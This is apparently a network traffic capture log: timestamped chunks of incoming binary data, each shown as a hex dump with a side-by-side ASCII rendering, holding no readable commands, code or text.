2022-12-20 13:15:38 UTC	691	IN	Data Raw: 23 12 36 60 65 bf 4a e2 e2 ca ae f6 07 9a d9 f8 af b6 f7 5f d0 10 b3 0f b3 43 2c b8 cf 07 38 5e 9f 9d 64 79 9b 23 e9 9c 0f c2 b8 eb 6b 2b 1d 30 d2 24 64 1c e4 bf b6 01 a7 c6 a2 71 ee 78 07 ae 6a 15 2a 77 39 04 a9 e0 01 56 22 77 ea 40 4c 8c 63 b5 66 96 a0 d8 91 5b ed 41 b9 d9 5a 8a 99 57 cc 51 bd 54 fa 66 8a e8 51 d0 8b 98 7f 00 ee 45 96 bf 7c 5e 41 18 7b 6e 54 ff 00 17 cc 3f c6 bd ad a7 2f 7d 6c 02 80 36 fc a1 78 c7 af 1d fb 57 83 7c 1a 6f 3b c5 4e 91 fc a1 a0 3d 71 8e 19 7b 9a f7 35 b1 95 6e a1 21 91 4f 9a 31 9e 06 0f 1f e7 e9 5d 5f 61 1c eb 73 ac d6 c3 86 b6 ba 31 16 c4 43 18 03 20 e3 03 f5 af 9e 3e 30 de b5 9b ce 9b 5e 21 31 de 11 87 7a fa 62 54 6b db 18 ad 9a 55 19 80 30 c0 ea 46 7d eb e7 cf 8a da 52 dd 07 ba 90 06 8d 00 c0 6e 0b 9f 6a e9 a8 95 8c a3 Data Ascii: #6`eJ_C,8^dy#k+0$dqxj*w9V"w@Lcf[AZWQTfQE\|^A{nT?/}l6xW\|o;N=q{5n!O1]_as1C >0^!1zbTkU0F}Rnj
2022-12-20 13:15:38 UTC	707	IN	Data Raw: f2 cb 42 c2 4c c8 7a b1 0d db fd d2 3a 57 1b f1 f7 e0 de 9d f1 d7 e1 ac 56 d2 58 c7 fd bf 65 03 ff 00 63 6a aa 02 ad c8 4e b0 ee e9 96 0b 8e 79 e7 35 d4 f8 03 5c d3 f5 5f ed 18 6f 83 3c 01 d9 c7 ce 27 86 14 ce 02 14 23 23 00 fd ef d2 ba d9 3c 3b 6f 6b 6a 6f b4 83 29 d0 a4 90 7f a2 be 48 88 e7 02 45 39 39 1e e7 90 08 f5 a2 15 27 4d f3 a3 c2 c4 c3 de d4 fc a9 d1 bc 27 0d 95 9d da c6 2d 44 b1 33 fd a2 1b 99 4e f8 95 49 05 0a e4 23 64 0f af 3d b8 ce df 87 61 f0 f7 9a 23 d5 ee ec ac 19 a1 31 ab 41 6c 1a 42 1d 71 b5 b6 02 5b a9 00 9c 1e 9c f4 ae b7 f6 98 f0 3c 7e 18 f8 d3 e2 25 4e 2d 9c ad ea aa fd d9 8c 83 71 00 71 8c 90 d5 53 c2 be 14 d6 6e 2d 92 ef c3 fa 5c 1a 9d 85 f4 09 6a 2e 67 b7 43 25 a9 9c 94 2e d2 95 e8 b8 7e 0e 70 50 71 d0 d7 a4 eb c6 32 bc dd 91 e0 Data Ascii: BLz:WVXecjNy5\_o<'##<;okjo)HE99'M'-D3NI#d=a#1AlBq[<~%N-qqSn-\j.gC%.~pPq2
2022-12-20 13:15:38 UTC	723	IN	Data Raw: a9 24 ac 67 ca 8e a7 c0 52 f9 76 93 22 b6 4c 73 75 c1 f4 1e a2 bd 1a d2 7d eb cf df 23 a5 79 5f c3 b2 25 b7 98 24 a6 40 76 9c 64 70 2b d2 6d 19 91 23 24 e4 f4 35 d7 4f e0 47 14 be 26 69 c2 ed 83 e8 4f 4c 54 ab 26 1d 06 77 60 6d 27 d2 aa c3 21 74 61 81 d6 a5 2b 94 04 9e 0f 39 a5 22 90 fb c4 52 22 62 01 52 7a f7 15 e7 ff 00 16 af e7 d3 ad 2d 2e 64 86 69 ad e1 dc 1e 58 14 12 a3 8c 16 19 fd 6b d1 23 5f 32 08 86 7a 93 cd 53 d5 ac 96 e6 1d 8e aa ca 47 21 86 41 f5 ac 1a 6d 68 5a 76 77 3c 27 4b f8 89 a5 ba 95 13 4d 1b 6d 23 94 20 ff 00 3a d1 83 c7 7a 38 85 77 ea 1b 49 04 fc c8 c0 0f c8 56 4f c5 3f 83 d7 1a 2e ed 6f 43 8d 8d aa 1d f3 5b 27 de 88 ff 00 79 7d 57 db b7 f2 f1 db c7 94 00 55 98 46 49 21 4f a1 ed 5c 6e ab 8b b3 5a 9d 8a 31 96 a8 f7 7b 8f 1f e9 0a 76 ae Data Ascii: $gRv"Lsu}#y_%$@vdp+m#$5OG&iOLT&w`m'!ta+9"R"bRz-.diXk#_2zSG!AmhZvw<'KMm# :z8wIVO?.oC['y}WUFI!O\nZ1{v
2022-12-20 13:15:38 UTC	739	IN	Data Raw: 70 98 1c 7a e1 57 b9 39 3c 9c 0f 56 f8 65 fb 68 f8 77 c4 de 1c 8f 50 f1 a2 2f 85 a5 7b 96 b6 b7 bb 70 5a 0b bc 64 e4 60 12 a5 46 03 1c 6d 04 f5 1d 07 af 42 b4 2b 2e 47 bf e7 e8 70 35 28 da 47 d5 bf 11 35 a8 35 5f 0f 39 83 76 e0 33 b5 87 35 f2 47 c4 cf 0c 7f c2 4f a4 5e c4 24 78 5e 54 31 bb a6 43 6d 3f 78 02 39 e4 64 71 eb 5f 40 f8 57 c7 fa 07 8b 61 5b 8d 27 5a d3 b5 6b 5e 85 ed 6e 52 55 e9 9c 1c 13 83 8e c6 ab 78 b7 c1 5a 56 aa 0c d6 72 c7 66 d2 0c 92 0e 63 fc 7d 3f 0a e8 a9 4f dc e4 b6 84 a9 b7 2b b3 f2 c7 59 f1 5d c7 84 bc 5d 6d a8 1b 28 bc 9b 6b 2b 7b 6b ab 15 39 8e 7b 56 8d 56 58 db 39 ce d6 62 bd fa 83 fc 35 2d ed 86 91 f0 f7 52 6d 26 f4 36 ad f0 b7 c5 60 4f 67 70 49 2f 65 21 e8 ca 7f 85 e3 ce 0f aa f5 ce 08 af 73 fd aa fe 08 26 83 e1 fb dd 7a ce d6 Data Ascii: pzW9<VehwP/{pZd`FmB+.Gp5(G55_9v35GO^$x^T1Cm?x9dq_@Wa['Zk^nRUxZVrfc}?O+Y]]m(k+{k9{VVX9b5-Rm&6`OgpI/e!s&z
2022-12-20 13:15:38 UTC	755	IN	Data Raw: c4 c0 10 cc 54 ed 63 86 e1 5b 70 07 3b 86 46 2b 97 d3 b5 06 d2 62 68 b4 f9 e4 49 65 8f 6c d3 a9 2a 70 71 98 c7 b6 7a 93 d7 1f 9e 7c 8a 16 46 50 c4 9f bd cd 73 ce 0e aa 71 7a 45 fd ef fc 8b 8c b9 5d d6 e6 e5 b5 cb 5c cc 8c e4 37 b9 f4 f4 f6 c5 5b 74 12 c4 c3 03 8f 6e b5 8f 63 e6 1d a4 8c 0c fd e1 5d 3d b5 9f ee cb e7 20 0e 46 38 ae a8 ab 2b 23 37 a1 cc 6a b6 c1 63 72 14 1d df d6 bd 4f e0 97 85 6d 74 2d 0e db c6 3f 63 63 e2 3b 7d 46 48 ec 5e 5e 62 ff 00 57 85 0e 87 8c 06 df cf 07 8c 67 a5 53 f0 7f 85 2d b5 a9 f5 39 26 d1 ee f5 a8 6d 2d 1e 59 2d ed 51 8f 94 31 c4 a4 ab 02 36 9e c4 10 6b d5 bc 3f af da 7c 40 d6 b4 7d 26 d6 4f b2 25 c4 82 ee e6 f2 1b a0 8b 0c 91 91 21 26 40 32 4b 39 09 bb d5 c0 e7 e6 15 f2 f9 c6 2a 51 4a 8c 13 df 57 d2 dd 89 77 6e 31 57 d5 fe Data Ascii: Tc[p;F+bhIelpqz\|FPsqzE]\7[tnc]= F8+#7jcrOmt-?cc;}FH^^bWgS-9&m-Y-Q16k?\|@}&O%!&@2K9QJWwn1W
2022-12-20 13:15:38 UTC	771	IN	Data Raw: 87 2c b3 42 c3 59 3b 6f 1b ca ea cd b4 7e 17 26 ee b9 19 aa 8b 67 70 e6 41 5f b2 de 5d 63 e8 ed 5a e6 1b 7e e1 cf 0e 37 c2 54 c7 f2 dd a5 97 0d d6 4f d9 ba ce 8e 2d 7e fe b8 44 15 10 7e 4d 42 b0 58 6a e4 e8 79 93 2d ba 9d e2 ca 62 a4 0b fb 22 6e a0 4d ec 35 6b 4e c7 cd a1 e5 8a 0d 57 5c 24 b9 b9 cc 9c 3f fe f7 b8 96 d4 48 cc 00 51 44 a6 7f 67 96 ab 3e 65 97 12 18 7c c9 92 81 cb fa 93 f8 f1 19 c7 02 92 e9 bd dc 2b b0 8b f7 a4 4e 3c c3 c6 7b 91 18 6c 90 a0 32 59 9f 91 c7 17 d2 10 b8 09 1f e9 6a 64 d5 b7 23 24 dc 17 b9 a8 7b 7c 58 38 00 9b d2 b5 28 e8 27 e2 d7 1d c5 b6 f9 83 b0 d9 33 01 51 85 21 24 fe 68 44 aa af 24 5e 06 6a 1c 38 61 cf 54 49 27 6e 25 5c e7 f3 c7 b5 54 ca 0e c3 da 62 27 93 1e 7b 51 7c 7b 3d 3a d9 e7 89 1a 7f 97 af c3 15 28 cf fd cb e7 77 91 Data Ascii: ,BY;o~&gpA_]cZ~7TO-~D~MBXjy-b"nM5kNW\$?HQDg>e\|+N<{l2Yjd#${\|X8('3Q!$hD$^j8aTI'n%\Tb'{Q\|{=:(w
2022-12-20 13:15:38 UTC	787	IN	Data Raw: 5b 3e 6c 58 c8 cd 05 ad c4 d8 cb d2 5f b4 99 78 6b 7f 7a ae 7e 63 d5 7d 71 4c de eb a3 52 67 40 b6 ef 3e ac 8b 0f 60 a1 7f 11 ec 26 a1 d4 b1 88 e9 4e 4a 54 1f 4c e1 74 fb 2f 3e bc 4b 66 d1 b2 d3 ec 36 72 23 62 52 0e 6f 2f 06 f1 3c 6a 06 32 a7 5b b9 69 b7 1f 7b dd 8f fc 9c ef 4d 5a ef 4f 1e 94 2a a0 91 b7 83 c1 c9 33 98 f4 74 13 89 27 44 88 11 ec ea f1 c8 7c 5c f7 4f 23 fa 7a 16 42 46 11 dc dc 1d cb ae 1f 85 8c 09 f1 e2 c3 ce f9 88 ff 6c c3 d7 cb 9c f0 1f 47 f1 71 17 42 e4 52 24 87 37 99 93 26 10 a2 2c 85 9d dc 09 b2 e4 a3 bc 05 01 67 f5 71 8f 32 c6 c0 47 84 49 0d 77 58 10 f2 8d eb 57 57 61 ac 33 1f 39 c5 28 94 d6 e9 a1 f0 a2 83 e8 9d f0 4a e3 07 87 3c ad 49 db d4 cb ad b3 49 7c f6 78 cf 8a d0 0b 08 bb 5a fe b7 01 1b b6 ed 1d 1b 62 1d b8 b8 d7 83 e6 90 5d Data Ascii: [>lX_xkz~c}qLRg@>`&NJTLt/>Kf6r#bRo/<j2[i{MZO*3t'D\|\O#zBFlGqBR$7&,gq2GIwXWWa39(J<II\|xZb]
2022-12-20 13:15:38 UTC	803	IN	Data Raw: e8 de ab c0 eb 0e 5d 86 5b e6 b3 f0 58 0b 09 4e b7 d8 f8 ab 9b 45 b2 32 8c 1f d6 0f 59 c5 af 7c 08 ff c0 f0 8e a1 18 c5 0d e2 f2 79 33 44 fb 8d 67 88 ab 07 72 1f b6 30 cc be 18 59 e9 7b fc b8 1f cb f5 d7 cf 30 b6 30 e2 d9 9b 4e a2 1c 9f 51 5b 92 8f f8 df b5 2c 0d 0c e4 fc 6a 21 de 49 59 61 a3 13 8f 9f 9b 40 01 d5 7f 23 76 f0 1b c5 8b af f3 6a ac 25 8d 8d 79 a8 fb e7 50 7f cd 91 e7 7f 06 a0 50 fc 96 14 a3 df 98 7f 5e 85 65 e0 2a d6 98 0f 63 9e de 7d de 26 eb 08 16 e1 16 26 56 6a f8 88 19 50 34 3a 88 a7 96 5f 59 1f 9d c4 b1 5b 7d 29 94 ec 22 6d 9a 17 bd b3 4e e2 73 a9 9d cd 43 dc 50 ac 18 c4 aa 3b 63 a9 ce bc 4a 96 50 35 e6 16 23 39 fc cd 92 fb 86 7e 94 ac b2 43 e9 b9 11 b7 6a 32 a9 72 7d 47 ce ce ed f8 ee 4b e4 c4 c1 21 34 2f ca 04 8d 15 f8 84 2f 67 be 97 Data Ascii: ][XNE2Y\|y3Dgr0Y{00NQ[,j!IYa@#vj%yPP^e*c}&&VjP4:_Y[})"mNsCP;cJP5#9~Cj2r}GK!4//g
2022-12-20 13:15:38 UTC	819	IN	Data Raw: c9 9d 73 71 23 b8 22 35 89 4f 77 57 52 a2 57 82 7f d7 16 4a ba dd f1 10 6d 65 4c f5 22 56 45 29 21 b3 c4 89 eb c7 a2 d8 30 b3 1d a5 07 3d 4c af 28 a4 30 61 2d fb de 4f 60 e3 c2 b7 0c e8 1c 8e b4 b3 3e e9 69 79 7c 76 f8 cd e5 e6 89 c4 ee 5d c3 f1 69 29 ec fc fc 98 fb 6f e7 b0 74 71 39 be 7b 5f d1 bd 72 33 ef 4b db 99 72 03 86 af 5e 87 d2 1d 1d d6 4e 92 e5 c4 e2 3d 2c 1d 6d cb a7 57 6b b1 f0 1b cb 7a 03 03 2e e8 94 f2 f3 c2 6d 42 cb 63 31 b8 70 8a 71 cd c5 3c 4c 38 40 60 d2 53 c6 5d 5d cc 60 d1 51 8c d9 97 4f e1 05 37 06 06 9d 63 a0 6f 01 4a 2f cc 59 72 53 92 aa e0 1f 8c 1b 2d 4b ec 8f 14 12 0f ab 92 9d 35 08 f9 59 36 6c 9d 1d 40 8a 7d 14 95 ab ce f2 40 40 e3 7b 86 5d 67 99 b7 87 e0 eb 74 24 36 5f c3 39 6d 1f e3 bd ba f9 e9 33 92 98 13 9d e4 7c 7a 4b cc 85 Data Ascii: sq#"5OwWRWJmeL"VE)!0=L(0a-O`>iy\|v]i)otq9{_r3Kr^N=,mWkz.mBc1pq<L8@`S]]`QO7coJ/YrS-K5Y6l@}@@{]gt$6_9m3\|zK
2022-12-20 13:15:38 UTC	835	IN	Data Raw: c6 2c 06 5b ee 66 a0 c3 6b 8c e2 47 d0 3b 69 06 42 eb 5d 09 4a 1a 4a f3 ad c5 0c 39 b3 95 82 05 37 29 bb 38 97 9b e7 62 b8 74 a7 9f a0 1c 86 21 f6 33 80 7a ff 37 dc f5 f0 e2 80 c5 51 96 cc 7f 41 aa 57 2c 6f 85 5c a9 18 25 a0 f1 88 e5 6c ef 89 e7 6a ec 18 a2 47 b8 72 e1 9d 03 72 33 b7 f2 54 2e 84 0f a9 16 14 fc 7c 00 69 49 d4 ac 89 61 fb 31 0d 0e 18 f6 90 70 e0 38 85 53 be d3 c8 32 1e 17 f9 93 e3 fa 89 f9 ca c9 cc 90 bd 8f e9 bf 83 34 94 6d a3 e7 66 23 76 13 a7 90 f7 d0 91 87 23 62 89 ec 68 63 a8 f3 02 b2 9d 8e b1 2e bc 83 f1 c3 e3 50 2b 0d e6 e0 d7 5e 72 bd 2f 91 10 b3 02 43 d3 9f 5c 5d d1 17 7e 5a 30 69 ee 28 ce 3a af c1 20 42 1d 0f 85 0a e2 8f 55 f3 62 d6 73 22 7f d6 50 e0 55 c5 bb 9e 33 18 df ad 62 b9 6f 35 36 03 4c b8 9d d9 c1 ee e5 d9 1c 9d d9 83 d4 Data Ascii: ,[fkG;iB]JJ97)8bt!3z7QAW,o\%ljGrr3T.\|iIa1p8S24mf#v#bhc.P+^r/C\]~Z0i(: BUbs"PU3bo56L
2022-12-20 13:15:38 UTC	851	IN	Data Raw: 73 f1 13 b3 4e 3c 62 e2 ee 2e 16 70 98 59 72 a5 9c 6b 9d c2 bc e4 cf d8 85 ef 64 c8 dd f5 b4 4d c9 c1 d8 b9 83 6d 16 63 59 b3 ec 0b e6 21 15 f8 8f 8f 65 9c fc 67 be 7d 2c 61 4c e8 30 96 f7 4b 25 bf fc 03 17 56 27 60 96 15 cd f8 b9 ab e9 8c 1d 4e fd 5e 4f 56 0f 90 e7 c4 51 41 f8 af 98 c3 e4 4b d9 d8 5c 59 4e 6f 8e 17 03 ea ad 78 fb f3 36 77 b7 ea 20 7b a9 10 95 c9 62 f8 65 7a 60 7f 66 28 e9 02 8a 97 5d 55 cc f9 65 7f 79 dd 6f 01 01 81 7a 58 7c 34 e4 c1 61 03 a6 3d 69 43 e1 f2 37 dc 2e 5e 64 ec ea 6b ec 0c c8 e0 ba ea 24 a2 c2 32 d0 5b 25 44 ea 16 5f 62 3c b6 f3 b7 a0 10 bf fb 25 e8 f9 c4 b0 72 ab 07 07 05 c5 3b d1 6e 94 c0 3e e2 d8 db f7 3e 1e 45 3b 99 b3 ab 9e 33 ab e4 e9 da 69 cf ea 25 fa 08 ff 0e e1 d7 88 4e 4e 59 bd e6 6a 7a 31 fa 1e fb 30 bb 9e 86 5e Data Ascii: sN<b.pYrkdMmcY!eg},aL0K%V'`N^OVQAK\YNox6w {bez`f(]UeyozX\|4a=iC7.^dk$2[%D_b<%r;n>>E;3i%NNYjz10^
2022-12-20 13:15:38 UTC	867	IN	Data Raw: 6f c2 5b 18 2b dd 1f cb aa 09 0c 6a 4c e6 ee b5 85 24 6a 6d 23 f9 ac 38 0d 12 d9 b4 de ec 8b f6 85 2f 84 9c 71 66 dc 65 4d d6 2e 6f c6 78 cf 03 52 3a 07 50 73 78 0f c1 3d cf d1 97 69 e5 8f f0 57 fa 2a 5f 43 35 3b 95 59 5f 77 32 f2 6c 3c 7f e3 e2 d8 7b 41 14 df a8 eb e8 a8 bd 67 b7 86 0c ff 6a 02 09 2b 0a a2 df f9 46 56 ba c8 70 72 c5 7d 2e e8 4d 26 d6 55 8f d7 41 06 2c ba b4 92 7d af 13 f9 1b f5 1f ff 2f ae ff 7d 82 d7 cc 22 d7 c9 8b c5 a3 fb 61 b4 e5 39 9f 1e a7 b3 d2 2a 81 43 02 d5 9b d8 3d 9e a3 4e 0f 58 3f 4d 89 4b 18 73 3b 23 96 ce 80 8b 9c 6a fb 85 6b 51 09 ee 7f bf d2 35 4a d0 32 71 1e f8 45 da 30 25 fd 36 17 45 5e b2 f4 48 1e 63 24 72 c8 52 13 a6 ee fb 01 84 9c 05 d4 95 d4 97 d8 e3 de 38 86 de e5 c6 b0 65 2c 97 af 66 bc bf 0f 63 67 f5 c7 ee 47 06 Data Ascii: o[+jL$jm#8/qfeM.oxR:Psx=iW_C5;Y_w2l<{Agj+FVpr}.M&UA,}/}"a9C=NX?MKs;#jkQ5J2qE0%6E^Hc$rR8e,fcgG
2022-12-20 13:15:38 UTC	883	IN	Data Raw: 9e e9 8e 6e d6 56 ce f9 e8 51 3b d2 0b 8d 60 7d fc 1b fe 60 f9 4a 87 d7 7f 9f 33 ca 57 86 de ca 53 54 4f 5c cb e3 c2 d3 a4 4b 7b 90 f4 a8 81 f7 8b 9f d2 77 d9 4f 34 5b 0a 19 f0 cc 94 18 2a 38 76 4a 83 84 3f 42 14 74 58 52 ab bc 82 7d de 49 64 6c f9 ca 85 b0 70 9e 05 2f e5 70 d9 49 66 1c 12 11 a8 78 1e 05 59 29 d8 55 7f e4 e4 70 6b 7e b7 4d c1 2e b4 9e 6b 16 31 f4 3d f6 86 6b 52 93 b9 7b 22 87 6f 03 97 73 3d e2 0e bb ac 1b 51 d8 d1 40 4d 58 00 ab 57 15 f1 fd fe 29 5a dd d4 a9 ba 73 8e 8d 83 aa 78 dc 3c 15 4d 91 01 ec b2 db 46 63 cf 64 f6 ec b9 4f b3 b4 60 a8 2f 11 c6 e8 d4 4b fa 26 5f c7 fc 61 39 d3 22 2e 12 38 e5 36 61 f6 fb 71 1a 2b c9 12 d7 05 c8 f8 bb 71 53 4c 8f fa 57 4f 39 d9 f7 38 c3 4b b6 a2 e0 e8 c1 fd 8e 87 ac 35 9b 44 59 7a 1e f7 ed e7 22 b4 7e Data Ascii: nVQ;`}`J3WSTO\K{wO4[*8vJ?BtXR}Idlp/pIfxY)Upk~M.k1=kR{"os=Q@MXW)Zsx<MFcdO`/K&_a9".86aq+qSLWO98K5DYz"~
2022-12-20 13:15:38 UTC	899	IN	Data Raw: 63 c4 ac 58 a4 1e fa 50 f3 ef 17 1d f9 35 b8 fc b1 25 79 c7 65 14 cf af 23 c4 ad 85 61 9e 91 68 0f f8 cc 08 d1 d9 9c 1e 28 d0 91 9f 6f 79 98 76 96 fb 3f 4c 79 3d 73 24 fe a6 13 51 4c 9c 4a 55 e8 41 c6 f6 64 92 d4 b7 8b 3b f9 cf c8 ab b4 66 5a d8 3c 42 db 9f b2 53 ee 25 b9 db 9f 71 62 ca 01 4c bf ad e3 91 5a 1b c1 ea c1 ac 5c b3 0c d7 d3 1d 38 2c cc c3 7f a8 22 07 ec cf e0 14 af c3 8b 13 a5 2c 35 b2 60 9a 81 1c fa ed 5f e8 f3 70 36 73 8f f9 23 29 ae 45 bf 0f 3b 70 ac 3d cf fa 3b c9 ec b3 53 67 c3 b9 10 76 86 f8 52 36 75 18 7e 9d 7f d0 98 e0 4c cb 8b 21 bc d9 94 8a fe 8c e1 0c bb 15 85 2c 37 b8 b6 2c 89 37 4b df 12 ff eb 3c f2 55 93 99 5d 39 81 f3 7a 3a c8 eb 75 72 7e f5 29 8e a8 f7 61 4d a0 21 21 7d 96 b0 f0 dd 74 a2 96 f9 a2 a9 a4 c6 8c 96 27 88 1a ae a6 Data Ascii: cXP5%ye#ah(oyv?Ly=s$QLJUAd;fZ<BS%qbLZ\8,",5`_p6s#)E;p=;SgvR6u~L!,7,7K<U]9z:ur~)aM!!}t'
2022-12-20 13:15:38 UTC	915	IN	Data Raw: 9f e7 f0 0b b4 e0 c5 c9 54 ac 5c 6e 32 34 cf 1e dd 29 43 f9 2b 1a 48 80 ea 0b de 8d 9c ca b8 fd 21 8c fe 69 cb ab b4 b9 6c 6d 6f e5 d0 dc c3 48 4f 39 8c d8 a4 04 a6 9f 7c cd a9 e6 66 4e 0b df 64 e4 c8 66 8c 3e ad e1 d5 99 78 72 c7 27 a2 d3 eb c5 e0 be 31 ac ae 72 14 f4 d0 55 36 24 bc 27 e5 84 2f f7 3d 8e 08 ac 68 0f 9b 47 0f c0 34 2f 1d 87 de bd 14 76 a5 11 67 2f 4b a8 dc 4b 74 c7 68 a2 e9 30 80 1f 9a b9 14 8f 1f 8d f3 e6 d3 44 e4 6a f3 76 f6 03 0c 6b 66 23 f7 db 99 5d e7 16 d1 15 aa ca e7 93 db 79 60 58 c5 79 cd d9 ac 5a 77 98 d9 d7 47 fc f7 03 36 3d 49 1e 7f 55 27 f4 5c 66 92 ba a6 81 dd 53 06 60 fe 73 39 63 97 f5 e5 54 9e 0b 29 41 0b 70 17 a0 fb a3 79 07 68 b1 18 c5 2f f9 3d 54 ad 5f cd da e2 7e b4 cc c9 a1 56 73 b3 40 51 42 49 d5 0d 25 4c ce 92 f9 2f Data Ascii: T\n24)C+H!ilmoHO9\|fNdf>xr'1rU6$'/=hG4/vg/KKth0Djvkf#]y`XyZwG6=IU'\fS`s9cT)Apyh/=T_~Vs@QBI%L/
2022-12-20 13:15:38 UTC	931	IN	Data Raw: d8 14 33 77 9f 38 5e 67 67 72 69 d2 35 14 06 29 b0 b6 5e 9c 59 bb 85 d8 3d 7e 12 3d 43 7f 73 4b a0 dd 01 c3 cb 39 16 63 8d 56 ea 36 de 9f 96 22 39 70 05 31 22 99 2c 6e ce a2 58 dc 17 73 dd 0e 5c bf a6 93 7a 64 01 f1 c9 cd 14 2e f5 e5 79 96 24 76 55 96 18 bb be 63 f1 cb 66 c1 fa e8 e0 a4 58 4c 9e 65 2b 31 82 d0 6a 7b 9b 84 5c 8e 06 d7 af 3a 12 58 55 c5 be 69 06 ac 14 6a c1 43 7f 00 d9 7d 0a d0 fe fa 83 80 13 03 09 f8 32 91 c9 71 f1 0c 58 61 4f a2 58 06 89 b5 71 5c 8a a8 23 2e f3 11 d6 f9 e1 0c fd f2 9a f0 e1 c2 28 3f 79 46 ef 97 67 54 97 79 90 54 d6 cb f9 73 23 d0 98 79 8a 73 c2 12 58 cf dc cf cc ef b7 10 c7 99 d7 4f 15 98 f4 7c 39 23 4c 52 e9 fe b3 06 67 8d 34 f2 da 47 f3 b9 d8 83 94 9e 69 dc bd 35 1a 77 89 99 a8 6d 9f c5 ea fe ba c8 7e 11 c6 c5 c8 91 63 Data Ascii: 3w8^ggri5)^Y=~=CsK9cV6"9p1",nXs\zd.y$vUcfXLe+1j{\:XUijC}2qXaOXq\#.(?yFgTyTs#ysXO\|9#LRg4Gi5wm~c
2022-12-20 13:15:38 UTC	947	IN	Data Raw: 66 af 99 bd ec 38 f1 c2 07 d1 c8 31 43 3f 6a 31 cf a2 8e 50 ba f8 3d c3 34 37 b3 44 40 03 67 2b 42 91 5e 1b 4b fe 86 57 58 7b 8f fb df 93 5f 3f 36 5b 51 20 2e c1 e3 e4 43 c8 08 39 f2 73 fe 47 36 5c fd 40 9a bd 0c a6 af 57 32 83 0c 86 9b df e0 46 4c 01 2b 04 ba 5d 1a 28 82 56 f1 53 ba e7 3e a5 75 60 2e f7 f6 09 1a 78 d3 6a ae d7 ec 60 e0 e3 4e 54 9e 3d e2 7a ab 25 cf 65 16 61 1e a4 24 20 db 7b 3c 49 0f a2 7e d6 74 2c 0f bd e6 95 42 33 83 0e e5 32 ca c2 1c 13 e9 6f 04 4e 6e e2 d5 bd 22 52 e7 4d e7 c6 77 27 42 7c b3 d9 e7 3f 9a e9 a9 77 39 56 f4 99 7b 3f c3 f8 fa 4a 8b bb ad 4f f9 3c da 8b b3 83 fa d3 68 ae 4d f8 ea 8d 02 ed 7c 8c f7 c0 7c a2 47 5b f0 44 28 9e 1b ff 9e 11 92 fa 97 b7 1b e3 39 35 6f 21 56 12 99 8c 7a e4 8e 5c 72 2c 57 8d e2 78 39 25 10 2f ed Data Ascii: f81C?j1P=47D@g+B^KWX{_?6[Q .C9sG6\@W2FL+](VS>u`.xj`NT=z%ea$ {<I~t,B32oNn"RMw'B\|?w9V{?JO<hM\|\|G[D(95o!Vz\r,Wx9%/
2022-12-20 13:15:38 UTC	963	IN	Data Raw: 22 f3 a0 80 32 bf 4f e4 f5 84 5d a4 d7 0d 62 84 cb 78 94 dd d4 99 78 c5 94 8d 59 85 34 f7 9f cf 88 f3 ca 44 d9 7e 64 80 a8 c0 3c 87 2d c6 4d 2c 98 53 a2 1a 74 67 88 32 49 4c 99 d2 d2 cf bc 75 f6 e7 b0 48 36 63 17 ed 47 76 c4 24 ac 0d 55 58 dd 52 86 e1 e0 24 6e 65 ed a4 ea a1 27 af 04 45 74 fe 8f 08 f9 1f 37 60 62 f5 7f e0 54 d9 e1 32 85 74 fd a9 e1 c7 01 55 3a ba 2e f3 fc a2 12 53 d5 22 e9 32 1e 4c 52 ba 0e 93 ab 0e a2 fb 70 23 06 fd 04 01 72 a1 99 41 15 2b 69 98 68 c3 cb 51 97 11 3e 6c 88 e8 7b 3b ce 6c 39 c1 41 8f 24 0e af d6 a3 59 a7 0f 0a 6f bb b1 34 be 87 dc d7 70 da 07 77 f0 25 a3 19 83 80 0e 06 bd 92 65 d7 85 5e 66 ae 9d 85 ec 94 97 b4 38 7c 64 7a 5e 25 7a e7 aa 48 93 fd 4e 87 b5 35 2f 16 ac e7 c9 86 fb 4c 57 55 60 da 94 63 9c 1c b1 97 f9 7b f5 e8 Data Ascii: "2O]bxxY4D~d<-M,Stg2ILuH6cGv$UXR$ne'Et7`bT2tU:.S"2LRp#rA+ihQ>l{;l9A$Yo4pw%e^f8\|dz^%zHN5/LWU`c{
2022-12-20 13:15:38 UTC	979	IN	Data Raw: 17 48 f9 fd 89 7a 99 65 08 8d 81 6b a2 6a 3c 59 f5 14 31 f1 8d 4c f0 9c 8f 42 ff 58 e6 3c 36 e0 c3 88 67 04 ae 94 23 7f ae 23 a2 33 27 71 68 7c 0b ea 05 aa 9c 9b db 86 f9 97 52 ba 9d 3a 18 75 20 0b e9 f0 81 fc 3c dc c9 86 3b e7 f9 2a 9e c4 a1 25 fb 51 fb f4 95 9a f7 5a e4 e6 76 90 7b 77 1b c2 f7 4c 49 1c b2 0f 9f ba 16 86 55 75 21 ff 54 99 af 23 34 29 0e 93 45 31 e8 2f cb 16 5d 61 b9 e6 48 c6 bc 0a 24 e3 6c 0d 6f 6e ab 21 ed ba 94 a2 be cb 10 16 18 6e 9e 62 20 b7 d3 bb d8 9e 33 01 79 d5 10 1e 3d 89 e0 56 cc 72 56 58 4a 92 10 b3 9f ee 6f 89 e8 4b d9 12 ae ab c8 93 b8 e3 3c 59 10 8b 99 cc 53 02 7d 0a 28 ee 5d 8f fb aa 21 a8 24 6f e3 fb 99 23 f4 1f 6e cb 50 c7 25 6c 2b bf 48 af db 67 86 78 8e 66 ec e3 93 14 dd 6f 46 a4 7e 2c 8d 42 ca 1c f4 55 a7 ff df 69 4c Data Ascii: Hzekj<Y1LBX<6g##3'qh\|R:u <;*%QZv{wLIUu!T#4)E1/]aH$lon!nb 3y=VrVXJoK<YS}(]!$o#nP%l+HgxfoF~,BUiL
2022-12-20 13:15:38 UTC	995	IN	Data Raw: f5 b1 e3 ab 40 9d f6 e4 58 91 b5 da 86 13 cf 0c 59 97 f4 91 4b c9 13 48 7e b6 91 a6 f8 31 84 50 8f f2 7e 63 de 1b 18 20 31 c5 9e 93 45 93 39 f0 e1 ab 40 9d 73 d1 9a 31 8b 7b 46 2e 9c 3b 7a 0c f1 19 75 88 3d de cd f0 83 8e a4 38 0c 64 58 a3 2a 6e 1e bb 99 21 36 98 84 ed 5f 90 55 ab 27 57 58 9d 1f 63 2f b3 ec df 2a 46 0b b4 fc 46 80 15 77 77 0f a3 e9 de 27 4c 44 4f 73 d4 e2 28 9d 36 aa cc 55 88 20 73 52 01 a3 db 57 a2 3e 6b 3d 35 ab 6a 89 1b f0 9b 78 5d 5d 0a 76 cf a3 55 e9 2d 03 cf 2e 42 55 7f 33 23 76 0d e3 72 92 30 f7 6f 1d 44 4d f3 25 b2 0a cd b4 16 9e 64 d8 cd 73 bc 37 95 24 a3 74 13 4a e3 57 73 e7 04 f8 2d d9 c1 8b c7 21 c8 45 7d 43 bd ad 04 c9 b1 67 10 2b fe 41 c6 95 77 e4 1d 